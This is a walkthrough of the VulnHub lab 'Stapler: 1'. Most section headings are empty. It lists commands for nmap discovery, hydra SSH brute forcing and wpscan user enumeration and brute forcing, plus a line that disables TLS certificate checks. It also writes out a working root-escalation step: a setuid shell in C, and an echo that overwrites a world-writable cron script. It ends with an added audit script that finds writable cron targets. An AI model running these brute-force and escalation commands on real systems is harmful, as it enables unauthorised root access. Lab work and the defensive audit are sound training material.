VulnHub — Stapler: 1

Setup:

Victim Description:

Information Gathering:

nmap -sn -n 172.27.254.0/24

FTP Enumeration:

Truncated passwd file

SSH Enumeration:

hydra -L sshusers -P /pentest/password-recovery/SecLists/Passwords/darkc0de.txt -e nsr 172.27.254.41 ssh

SMB Enumeration:

Port 666 Enumeration:

Web Enumeration:

sudo wpscan --url https://172.27.254.41:12380/blogblog/ --enumerate u,ap --disable-tls-checks --log /home/ptester/Stapler/wpscan_41.txt

WPScan: Plugins
WPScan: Enumerated Users
WPScan: Enumerated Users 10–20

WordPress Exploit:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

MySQL Enumeration:

WordPress Brute Force:

sudo wpscan --url https://172.27.254.41:12380/blogblog/ --disable-tls-checks --usernames /home/ptester/Stapler/wp_users.txt --wordlist /pentest/password-recovery/dictionary/Passwords/Leaked-Databases/rockyou.txt --log /home/ptester/Stapler/wp_creds.txt

Remote Shell:

Method 1 — WordPress Plugin:

Method 2 — MySQL, SELECT Statement:

Local Information Gathering and Enumeration:

Privilege Escalation:

Method 1 — Stored Password:

Method 2 — Kernel Exploit:

wget on Stapler
SimpleHTTPServer on second attacking system

Method 3 — Cron Job:

echo '#include <unistd.h>
int main(void)
{
    setgid(0);
    setuid(0);
    execl("/bin/sh", "sh", (char *)0);
    return 0;
}' > rootpriv.c

echo 'chown root:root /tmp/rootpriv; chmod u+s /tmp/rootpriv;' > /usr/local/sbin/cron-logrotate.sh
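Method 3 works only because a script that root's cron runs is writable by an unprivileged user. The following audit script is an added defensive example, not part of the original walkthrough: it lists every file referenced from a crontab-style file that has a group or other write bit set, using a constructed fixture (temp directory, sample scripts and crontab) so it runs offline.

```shell
#!/bin/sh
# Added defensive check (not from the walkthrough): list scripts referenced by a
# crontab-style file that group or others can modify. A root-run cron job whose
# script is writable by an unprivileged user is the misconfiguration Method 3 uses.

# Usage: find_writable_cron_targets CRONTAB_FILE
# Prints "<path> <mode>" for every referenced file with a group/other write bit.
find_writable_cron_targets() {
    crontab_file="$1"
    # Drop comment lines, split the rest into tokens, keep absolute paths only.
    grep -v '^[[:space:]]*#' "$crontab_file" | tr ' \t' '\n\n' | grep '^/' | sort -u |
    while read -r target; do
        [ -f "$target" ] || continue
        # Characters 1-10 of ls -ld output are the type and permission bits:
        # position 6 is group write, position 9 is other write.
        mode=$(ls -ld "$target" | cut -c1-10)
        case "$mode" in
            ?????w????|????????w?) echo "$target $mode" ;;
        esac
    done
}

# Constructed fixture in a temp dir: one world-writable script (the weak
# setting), one mode-0755 script (the corrected setting), and a crontab that
# runs both as root. Prints the path of the constructed crontab.
make_fixture() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho rotate\n' > "$dir/cron-logrotate.sh"
    chmod 0777 "$dir/cron-logrotate.sh"
    printf '#!/bin/sh\necho backup\n' > "$dir/backup.sh"
    chmod 0755 "$dir/backup.sh"
    printf '# constructed crontab\n*/5 * * * * root %s\n0 * * * * root %s >/dev/null 2>&1\n' \
        "$dir/cron-logrotate.sh" "$dir/backup.sh" > "$dir/crontab"
    echo "$dir/crontab"
}

# Stand-alone run: audit the fixture, then the real system crontab if readable.
fixture=$(make_fixture)
find_writable_cron_targets "$fixture"
if [ -r /etc/crontab ]; then
    find_writable_cron_targets /etc/crontab
fi
```

Run it against /etc/crontab and the files under /etc/cron.d on a host; any line it prints is a script an unprivileged user could edit to run code as root.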

Flag:

Mike Bond